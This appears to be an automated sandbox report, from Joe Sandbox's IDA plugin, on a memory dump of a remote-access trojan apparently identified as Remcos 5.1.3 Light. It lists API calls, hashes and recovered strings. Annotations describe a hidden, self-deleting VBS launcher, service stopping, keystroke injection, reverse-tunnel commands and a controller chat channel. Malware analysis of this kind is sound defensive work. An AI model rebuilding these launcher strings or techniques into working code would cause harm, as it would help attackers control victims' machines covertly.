• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Similarity
• API ID: _free
• String ID: <VF$<VF$@VF$pAF$tAF
• API String ID: 269201875-3149002956
• Opcode ID: 2ec2b8a0bf515df920bc32823d9815f97b99a28ca1dfd781462ff9c2964c34cf
• Instruction ID: c61609b52f92b179b45dad1ed7c922baca2b62edbd6b2c6063e6288bfe8cdad6
• Opcode Fuzzy Hash: 2ec2b8a0bf515df920bc32823d9815f97b99a28ca1dfd781462ff9c2964c34cf
• Instruction Fuzzy Hash: D961C171D00205AFEB20CF69C942B9ABBF5EF49310F64416BF944EB381E7B49D419B98

APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,00412BE9,00000000), ref: 0041323C
• OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00412BE9,00000000), ref: 00413253 (dwDesiredAccess 0xF003F includes SERVICE_START 0x10 and SERVICE_STOP 0x20)
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412BE9,00000000), ref: 00413260
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00412BE9,00000000), ref: 0041326F (dwControl 1 = SERVICE_CONTROL_STOP: the opened service is stopped)
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412BE9,00000000), ref: 00413280
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412BE9,00000000), ref: 00413283
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID: +A
• API String ID: 221034970-2476349683
• Opcode ID: 87095fb4385b29cdfbcfcc0e04afdad436b789fd3cb9dc4a6ab262c150b21f18
• Instruction ID: 17f09bffcb53596e9d4bf123afaf80ec38c88fef937fd9beb363d4db4ef8fd0f
• Opcode Fuzzy Hash: 87095fb4385b29cdfbcfcc0e04afdad436b789fd3cb9dc4a6ab262c150b21f18
• Instruction Fuzzy Hash: E611E575D411187FD7206F649C89CFF3B6CDB4635AB00016AFA0593140DB784E4BAAF9

APIs
• WaitForSingleObject.KERNEL32(?,000000FF,00000000,?,00000000,00401AD4,00000000,?,?,?,?,00467C58), ref: 00401C59
• SetEvent.KERNEL32(?,?,00467C58), ref: 00401C68
• CloseHandle.KERNEL32(?,?,00467C58), ref: 00401C71
• closesocket.WS2_32(000000FF), ref: 00401C7F
• WaitForSingleObject.KERNEL32(?,000000FF,?,00467C58), ref: 00401CB6
• SetEvent.KERNEL32(?,?,00467C58), ref: 00401CCB
• WaitForSingleObject.KERNEL32(?,000000FF,?,00467C58), ref: 00401CD2
• SetEvent.KERNEL32(?,?,00467C58), ref: 00401CE7
• CloseHandle.KERNEL32(?,?,00467C58), ref: 00401CEC
• CloseHandle.KERNEL32(?,?,00467C58), ref: 00401CF1
• SetEvent.KERNEL32(?,?,00467C58), ref: 00401CFE
• CloseHandle.KERNEL32(?,?,00467C58), ref: 00401D03
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Similarity
• API ID: CloseEventHandle$ObjectSingleWait$closesocket
• String ID:
• API String ID: 3658366068-0
• Opcode ID: 67213f11f0f14dc77f4e99e744ab60b7066ff55c34f1dff5ffc962fee311c99f
• Instruction ID: 647261f9900fe491da89cb5d5ae73573130af4b1a9831dc02a6027ad4db015cc
• Opcode Fuzzy Hash: 67213f11f0f14dc77f4e99e744ab60b7066ff55c34f1dff5ffc962fee311c99f
• Instruction Fuzzy Hash: EA213B31544B01AFD7316F21ED09B1ABBA2FF41326F104A6DE0E611AF0CB75E851DB58

APIs
  • Part of subcall function 0040D18B: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00467F30), ref: 0040D1A7 (hKey 0x80000001 = HKEY_CURRENT_USER, samDesired 0x20019 = KEY_READ; the "exepath" value name among the strings below is consistent with this per-user registry read)
  • Part of subcall function 0040D18B: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0040D1C0
  • Part of subcall function 0040D18B: RegCloseKey.KERNEL32(00000000), ref: 0040D1CB
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,00000000), ref: 00408E36
• ShellExecuteW.SHELL32(00000000,open,00000000,0045962C,0045962C,00000000), ref: 00408F95 (launches the script assembled from the strings below: a .vbs in Temp that runs `cmd /c ""<path>"""` through WScript.Shell.Run with window style 0, i.e. hidden, and then removes itself with DeleteFile(Wscript.ScriptFullName))
• ExitProcess.KERNEL32 ref: 00408FA1 (the process terminates as soon as the script has been launched)
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Similarity
• API ID: CloseExecuteExitFileModuleNameOpenProcessQueryShellValue
• String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
• API String ID: 2135335499-2411266221
• Opcode ID: feee19f90c822f584134bc0ccec76dcda4c25d5825d796364cf455385b85a610
• Instruction ID: fa2d1577ff6c4dd0df342fc96389c47364483780c04f7bcf008f7b77c4008c2c
• Opcode Fuzzy Hash: feee19f90c822f584134bc0ccec76dcda4c25d5825d796364cf455385b85a610
• Instruction Fuzzy Hash: 7E413A31910118ABDB09FB61DC52DEE7729AF50305F14017FB506B70D2EE7C6E4ACA58

APIs
• GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040915E
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Similarity
• API ID: LongNamePath
• String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
• API String ID: 82841172-425784914
• Opcode ID: 0983152f58672d7fb224ec8f0c82a130f8ed3df98b64ce04b4db88e8d923456f
• Instruction ID: 593ac968e999b6fcb1afa8f523a49b2eed45a3e0272f2412b35337e24cb28c51
• Opcode Fuzzy Hash: 0983152f58672d7fb224ec8f0c82a130f8ed3df98b64ce04b4db88e8d923456f
• Instruction Fuzzy Hash: 69411E31901105AADB05FBA2ED578EE77789E60319B20403FB912761D3EF7C2F0D8659

APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,JnC,00436E4A,?,?,?,0043CE68,00000001,00000001,36E85006), ref: 0043CC71
• __alloca_probe_16.LIBCMT ref: 0043CCA9
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0043CE68,00000001,00000001,36E85006,?,?,?), ref: 0043CCF7
• __alloca_probe_16.LIBCMT ref: 0043CD8E
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,36E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043CDF1
• __freea.LIBCMT ref: 0043CDFE
  • Part of subcall function 0043B5D9: RtlAllocateHeap.NTDLL(00000000,0042CBD9,?,?,0042E317,?,?,5.1.3 Light,?,?,004095E3,0042CBD9,?,?,?,?), ref: 0043B60B (the "5.1.3 Light" string captured on this stack is consistent with a Remcos version and edition banner)
• __freea.LIBCMT ref: 0043CE07
• __freea.LIBCMT ref: 0043CE2C
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
• String ID: JnC
• API String ID: 3864826663-2531755783
• Opcode ID: f940c7817ddd6f836c54eefa34e2d49066d55026533aec00279bddeea0434e40
• Instruction ID: 16551e4f37cd50cf7fbfb2aa30d37855c537b24eff3af83edd6829f607421f63
• Opcode Fuzzy Hash: f940c7817ddd6f836c54eefa34e2d49066d55026533aec00279bddeea0434e40
• Instruction Fuzzy Hash: CF51E772600216ABEB258F65CCC2EBF7BA9EB48754F15562AFC05E6240DB38DC50C798

APIs
• SetEvent.KERNEL32(?,?), ref: 0040330D
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004033BD (GetMessageA/TranslateMessage/DispatchMessageA is a window message loop; with the CloseChat, DisplayMessage and GetMessage strings below and the send() subcall, this is consistent with a controller-driven chat window whose replies go back over the socket)
• TranslateMessage.USER32(?), ref: 004033CC
• DispatchMessageA.USER32(?), ref: 004033D7
• HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00467CF0), ref: 0040348F
• HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 004034C7
  • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Similarity
• API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
• String ID: CloseChat$DisplayMessage$GetMessage
• API String ID: 2956720200-749203953
• Opcode ID: f509bd7164c746319cd36665601198b893aec81501ad93ddea78b5d8a0b4536f
• Instruction ID: d860b0a56e94f76641ef76a8e7973dae8c749e614e4092a13e3eb52c91ae7d72
• Opcode Fuzzy Hash: f509bd7164c746319cd36665601198b893aec81501ad93ddea78b5d8a0b4536f
• Instruction Fuzzy Hash: 3F41C3326043009BCB00BF76DD9A86F7BA9AB85704F00053EF906A71D1EE7CDA09C75A

APIs
• _free.LIBCMT ref: 0043C534
  • Part of subcall function 0043BEB5: RtlFreeHeap.NTDLL(00000000,00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000), ref: 0043BECB
  • Part of subcall function 0043BEB5: GetLastError.KERNEL32(00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000,00000000), ref: 0043BEDD
• _free.LIBCMT ref: 0043C540
• _free.LIBCMT ref: 0043C54B
• _free.LIBCMT ref: 0043C556
• _free.LIBCMT ref: 0043C561
• _free.LIBCMT ref: 0043C56C
• _free.LIBCMT ref: 0043C577
• _free.LIBCMT ref: 0043C582
• _free.LIBCMT ref: 0043C58D
• _free.LIBCMT ref: 0043C59B
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 6349429f7da4dd04bd671fcc7f1dcaceb8753db72f2eaaffcae1a764faca52b2
• Instruction ID: c50bc2256fd40bb6b8c60e6ce880829711fb0bf02a5bbaa2345148bc22db0d7c
• Opcode Fuzzy Hash: 6349429f7da4dd04bd671fcc7f1dcaceb8753db72f2eaaffcae1a764faca52b2
• Instruction Fuzzy Hash: D211A776504108BFCB11EF59C892DDD3BA5EF08354F4150AAFB188B222DB35DA509FC8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 65535$udp
                                                                                              • API String ID: 0-1267037602
                                                                                              • Opcode ID: 392f821c8fdb78c16ca5c60518ad7c8d75f9996d43e8d60c91428dcb4e3f1822
                                                                                              • Instruction ID: 84486ce2f1bb3f426333e4d3ad8243f8e990da5f3cf8287c7bce91a3dc9f0a7e
                                                                                              • Opcode Fuzzy Hash: 392f821c8fdb78c16ca5c60518ad7c8d75f9996d43e8d60c91428dcb4e3f1822
                                                                                              • Instruction Fuzzy Hash: EE51E335600205ABDB248F2AD809BBB3764AB45340F088C7BEC45A73D1E73ECD618A69
                                                                                              APIs
                                                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044A50F), ref: 004499E7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DecodePointer
                                                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                              • API String ID: 3527080286-3064271455
                                                                                              • Opcode ID: abac6ed4de59e9d36f3893022c793c30d9b27768f13e93e51af2ea34c8abeae1
                                                                                              • Instruction ID: 110063cd0ce05d1060d43825b6a991279bdf802adc29d45c0d9515e70b7eb71e
                                                                                              • Opcode Fuzzy Hash: abac6ed4de59e9d36f3893022c793c30d9b27768f13e93e51af2ea34c8abeae1
                                                                                              • Instruction Fuzzy Hash: F751AF7090054ACBEF10DF68E94C4AEBBB0FB49315F60418BD880B7255CB79AD28EB1D
                                                                                              APIs
                                                                                                • Part of subcall function 00406B5E: char_traits.LIBCPMT ref: 00406B79
                                                                                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00467C58,00459450,00000000,?,0040547E,00000000), ref: 00404E61
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,~T@,?,0040547E,00000000,?,?,0000000A,00000000), ref: 00404EA9
                                                                                              • CloseHandle.KERNEL32(00000000,?,0040547E,00000000,?,?,0000000A,00000000), ref: 00404EE3
                                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00404EFB
                                                                                              • CloseHandle.KERNEL32(?,00000057,?,00000008,?,?,?,?,?,?,?,?,00000000), ref: 00404F1F
                                                                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00404F2E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
                                                                                              • String ID: .part$~T@
                                                                                              • API String ID: 820096542-3190281576
                                                                                              • Opcode ID: 3b7bb03e7171406c54650a712e0f1743b795b2b065571ff22ad1ea35b0f2dae9
                                                                                              • Instruction ID: 7c0ed4d063a9e04155bbcfc9f8ad653c8c905adfc315915fd9f293c083df040d
                                                                                              • Opcode Fuzzy Hash: 3b7bb03e7171406c54650a712e0f1743b795b2b065571ff22ad1ea35b0f2dae9
                                                                                              • Instruction Fuzzy Hash: 54315EB5D00219ABCB04EFA5DD468EEB778FB44315F1085BAFA01B7190DB746E44CB98
                                                                                              APIs
                                                                                                • Part of subcall function 00409474: char_traits.LIBCPMT ref: 00409484
                                                                                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004108D0
                                                                                                • Part of subcall function 004149E0: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,00000000,00000000,00000000,?,004108FA), ref: 004149FD
                                                                                              • Sleep.KERNEL32(00000064), ref: 004108FC
                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 0041092C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$CreateDeleteExecuteShellSleepchar_traits
                                                                                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                              • API String ID: 2701014334-2001430897
                                                                                              • Opcode ID: feff885c89399373f3c4a0b1e7d0616cbdad02ffb257a520dd5bf478f388978d
                                                                                              • Instruction ID: e682aa32545da1075197413550dedd9039f207d5310d298ab226810ec4c53ad6
                                                                                              • Opcode Fuzzy Hash: feff885c89399373f3c4a0b1e7d0616cbdad02ffb257a520dd5bf478f388978d
                                                                                              • Instruction Fuzzy Hash: 0A314F719101189ADB08FBA1DC92EEE7724AF50705F40017FF506770D2EE785E8ACA5D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d18bbd428483c74bce51ca1012cfe0dcc70ce8969ddd0aa423389588925d3c4f
                                                                                              • Instruction ID: 47e32140ea42008b6e2fbe39e058ee49646603e651697782d258c77751b7765d
                                                                                              • Opcode Fuzzy Hash: d18bbd428483c74bce51ca1012cfe0dcc70ce8969ddd0aa423389588925d3c4f
                                                                                              • Instruction Fuzzy Hash: 60C1FA70E042459FEF11DFA8D841BAEBBB0BF4D310F14419AEA14A7392C7789951CF69
                                                                                              APIs
                                                                                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004473CE,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 004471A1
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004473CE,00000000,00000000,?,00000001,?,?,?,?), ref: 00447224
                                                                                              • __alloca_probe_16.LIBCMT ref: 0044725C
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004473CE,?,004473CE,00000000,00000000,?,00000001,?,?,?,?), ref: 004472B7
                                                                                              • __alloca_probe_16.LIBCMT ref: 00447306
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004473CE,00000000,00000000,?,00000001,?,?,?,?), ref: 004472CE
                                                                                                • Part of subcall function 0043B5D9: RtlAllocateHeap.NTDLL(00000000,0042CBD9,?,?,0042E317,?,?,5.1.3 Light,?,?,004095E3,0042CBD9,?,?,?,?), ref: 0043B60B
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004473CE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044734A
                                                                                              • __freea.LIBCMT ref: 00447375
                                                                                              • __freea.LIBCMT ref: 00447381
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                              • String ID:
                                                                                              • API String ID: 201697637-0
                                                                                              • Opcode ID: 46c7a438ddb99d1cc0e511bb71b04e1777c4619828f97b31567a45340c70d4bb
                                                                                              • Instruction ID: 0a2115d0f49871cf642610963fb2ef61daaf79bca83d118575b9579562c159e9
                                                                                              • Opcode Fuzzy Hash: 46c7a438ddb99d1cc0e511bb71b04e1777c4619828f97b31567a45340c70d4bb
                                                                                              • Instruction Fuzzy Hash: 0991B271E082169AEB208FA5CC81EEF7BB5AB09354F14465BED01E6341D73CDC42D7A8
                                                                                              APIs
                                                                                                • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                                                                                • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                                                                                • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                                                                                • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                                                                              • _memcmp.LIBVCRUNTIME ref: 0043AAF1
                                                                                              • _free.LIBCMT ref: 0043AB62
                                                                                              • _free.LIBCMT ref: 0043AB7B
                                                                                              • _free.LIBCMT ref: 0043ABAD
                                                                                              • _free.LIBCMT ref: 0043ABB6
                                                                                              • _free.LIBCMT ref: 0043ABC2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorLast$_abort_memcmp
                                                                                              • String ID: C
                                                                                              • API String ID: 1679612858-1037565863
                                                                                              • Opcode ID: 4bd2d0aa180a844c3bfeb63cbfd115b52fffeb547571d82c9d5068b51f159042
                                                                                              • Instruction ID: c4661d0a74ae8308ead59343ecbb51613a8cf0527b1561a261068459944c83cc
                                                                                              • Opcode Fuzzy Hash: 4bd2d0aa180a844c3bfeb63cbfd115b52fffeb547571d82c9d5068b51f159042
                                                                                              • Instruction Fuzzy Hash: 0BB15975A012199FDB24DF18C884BAEB7B5FF48304F1045AEE949A7350E734AE90CF85
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: tcp$udp
                                                                                              • API String ID: 0-3725065008
                                                                                              • Opcode ID: 4ea1a0624809739be7cb6ad35bad68ba6a1498aee19020f9739b75e3dd0165ed
                                                                                              • Instruction ID: 2cfa6809cb724154de7c5257ff097518599a902fbcec9cb31fa9a61e5e6da04f
                                                                                              • Opcode Fuzzy Hash: 4ea1a0624809739be7cb6ad35bad68ba6a1498aee19020f9739b75e3dd0165ed
                                                                                              • Instruction Fuzzy Hash: 54817E70A00216EBDF248F96C94566A7BB1EF04315F14887BE805B73D0E778CD61DB99
                                                                                              APIs
                                                                                                • Part of subcall function 0041133B: __EH_prolog.LIBCMT ref: 00411340
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00459594), ref: 004111EB
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004111F4
                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00411203
                                                                                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004111B7
                                                                                                • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                              • String ID: <$@$Temp
                                                                                              • API String ID: 1704390241-1032778388
                                                                                              • Opcode ID: 4020ca899df10b69a3cb7db48745e2cbed4258c36e973762b8bffe8ea618c978
                                                                                              • Instruction ID: f7fd7360526dce7b80c1252073eef177887262dc2d48c10ab8877ccdce07747f
                                                                                              • Opcode Fuzzy Hash: 4020ca899df10b69a3cb7db48745e2cbed4258c36e973762b8bffe8ea618c978
                                                                                              • Instruction Fuzzy Hash: 3B41B431A002099BDB15FB61DD5AAEE7734AF10305F40417EF606760E2EF781E89CB99
                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,00412D7B,00000000), ref: 004131D5
                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,00412D7B,00000000), ref: 004131E9
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412D7B,00000000), ref: 004131F6
                                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00412D7B,00000000), ref: 00413205
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412D7B,00000000), ref: 00413217
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412D7B,00000000), ref: 0041321A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                              • String ID: {-A
                                                                                              • API String ID: 221034970-2249487690
                                                                                              • Opcode ID: 401f4a1600f5178c27bfe92e88e268514c7c3588f5d37f863d5ae499bed1e7ef
                                                                                              • Instruction ID: 7e647667e6c08bc6e9fb8e637e579d569d58eb8f592d23d6fbd5c62d0da24c2c
                                                                                              • Opcode Fuzzy Hash: 401f4a1600f5178c27bfe92e88e268514c7c3588f5d37f863d5ae499bed1e7ef
                                                                                              • Instruction Fuzzy Hash: C6F046359012187BD3206F659C4AEBF3B6CCB86356F000026FE0893141DF388E4685F8
                                                                                              APIs
• SendInput.USER32(00000001,00000003,0000001C,00000000,00000000,00000003,00000004), ref: 00412897
• SendInput.USER32(00000001,00000003,0000001C,00000000,00000000,00000000,00000003,00000004), ref: 004128BB
• SendInput.USER32(00000001,00000003,0000001C,00000000,00000000,00000000,00000003,00000004), ref: 004128DE
• SendInput.USER32(00000001,00000003,0000001C,00000000,00000000,00000000,00000003,00000004), ref: 004128FB
• SendInput.USER32(00000001,?,0000001C), ref: 0041291A
• SendInput.USER32(00000001,?,0000001C), ref: 0041293C
• SendInput.USER32(00000001,?,0000001C), ref: 0041295C
• SendInput.USER32(00000001,?), ref: 0041297D
  • Part of subcall function 00412844: MapVirtualKeyA.USER32(00000000,00000000), ref: 0041284A
Note: every call passes cInputs = 1 and cbSize = 0x1C (28 bytes, sizeof(INPUT) in a 32-bit process), and the subcall translates a virtual-key code with MapVirtualKeyA, so this routine injects keystrokes one INPUT record at a time. Arguments shown as '?' were not recovered by the static pass.
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Similarity
• API ID: InputSend$Virtual
• String ID:
• API String ID: 1167301434-0
• Opcode ID: 4c57448a38bb73011fe1d8cbfc53ccb25ff581db71d2bf486c24c5fff60de6aa
• Instruction ID: 24ca5d00d02f7653e18acf6bc68dbc8fd38b51cab6d69bb73ca3533017ab6641
• Opcode Fuzzy Hash: 4c57448a38bb73011fe1d8cbfc53ccb25ff581db71d2bf486c24c5fff60de6aa
• Instruction Fuzzy Hash: 8D318771D4034CA6EB14EBE5DD01FEFBBB89F59700F00011BE500B7191D6F95A558BA5
Note: the only API in this function is an Event call; its string set names the port-forwarding commands the function references (start and stop a forward or reverse tunnel, query the direct listening port).
Memory Dump Source
• Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
Similarity
• API ID: Event
• String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
• API String ID: 4201588131-168337528
• Opcode ID: 784d744d0aa7a66909bcf1d0778d565ced12278adbb9dc1867596fee42cf8144
• Instruction ID: 4c107d70a221628ff284c34145cd556a99705f34e20cdd27ed2f6698d2395ea7
• Opcode Fuzzy Hash: 784d744d0aa7a66909bcf1d0778d565ced12278adbb9dc1867596fee42cf8144
• Instruction Fuzzy Hash: 4C418131A147109BC604BB35CD5AA6E3A95AB41714F40463FF905BB2D2EFBC9A09C78F
APIs
• GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0043E3F5,0044A1E5,00000000,00000000,00000000,00000000,00000000), ref: 0043DCC2
• __fassign.LIBCMT ref: 0043DD3D
• __fassign.LIBCMT ref: 0043DD58
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0043DD7E
